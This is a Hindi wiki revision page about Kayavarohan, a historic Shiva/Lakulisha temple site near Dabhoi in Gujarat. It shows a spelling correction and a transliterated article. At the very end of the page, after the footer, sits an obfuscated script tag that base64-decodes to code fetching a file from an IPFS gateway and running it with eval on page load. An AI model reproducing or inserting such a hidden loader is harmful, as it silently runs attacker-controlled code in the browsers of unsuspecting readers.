Difference between revisions of "कायावरोहन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "जिन्होने" to "जिन्होंने")
Line 2: Line 2:
  
 
*यह स्थान भगवान शिव को समर्पित उनके [[लकुलीश|लकुलीश अवतार]] के मन्दिर के लिए प्रसिद्ध है।
 
*यह स्थान भगवान शिव को समर्पित उनके [[लकुलीश|लकुलीश अवतार]] के मन्दिर के लिए प्रसिद्ध है।
*लकुलीश भगवान शिव के 24वें [[अवतार]] माने जाते हैं, जिन्होने [[पाशुपत संप्रदाय|पाशुपत शैव धर्म]] की स्थापना की थी।
+
*लकुलीश भगवान शिव के 24वें [[अवतार]] माने जाते हैं, जिन्होंने [[पाशुपत संप्रदाय|पाशुपत शैव धर्म]] की स्थापना की थी।
 
*ऐसी मान्यता है कि 'लकुलीश सम्प्रदाय' की लोकप्रियता के साथ-साथ योगीश्वर शिव के स्वरूप का बैठे हुए लकुलीश में रूपान्तरण हो गया। इसमें लकुलीश की दो भुजाएँ, जिनमें एक में 'लकुट' तथा दूसरे में 'मातुलिंग' फल अंकित किया जाता है।
 
*ऐसी मान्यता है कि 'लकुलीश सम्प्रदाय' की लोकप्रियता के साथ-साथ योगीश्वर शिव के स्वरूप का बैठे हुए लकुलीश में रूपान्तरण हो गया। इसमें लकुलीश की दो भुजाएँ, जिनमें एक में 'लकुट' तथा दूसरे में 'मातुलिंग' फल अंकित किया जाता है।
 
*यह भी माना जाता है कि चारों युगों में कायावरोहन का अस्तित्व रहा है।
 
*यह भी माना जाता है कि चारों युगों में कायावरोहन का अस्तित्व रहा है।

Revision as of 14:07, 12 August 2013

kayavarohan gujarat mean sthit ek aitihasik sthan hai, jisaka sambandh bhagavan shiv se bataya gaya hai. yah sthan gujarat ke b dauda nagar se 16 mil (lagabhag 25.6 ki.mi.) dakshin-poorv mean sthit ek prasiddh nagar dabhoee mean sthit hai. gaandhinagar se yah sthan lagabhag 100 kilomitar door p data hai. kayavarohan ka adhunik nam 'karavan' hai.

  • yah sthan bhagavan shiv ko samarpit unake lakulish avatar ke mandir ke lie prasiddh hai.
  • lakulish bhagavan shiv ke 24vean avatar mane jate haian, jinhoanne pashupat shaiv dharm ki sthapana ki thi.
  • aisi manyata hai ki 'lakulish sampraday' ki lokapriyata ke sath-sath yogishvar shiv ke svaroop ka baithe hue lakulish mean roopantaran ho gaya. isamean lakulish ki do bhujaean, jinamean ek mean 'lakut' tatha doosare mean 'matuliang' phal aankit kiya jata hai.
  • yah bhi mana jata hai ki charoan yugoan mean kayavarohan ka astitv raha hai.
  • kayavarohan se doosari shatabdi ki anek moortiyaan aur chihn prapt hue haian.
  • is aitihasik sthan se bhagavan kartikey aur uma-maheshvar ki pratima bhi prapt huee haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>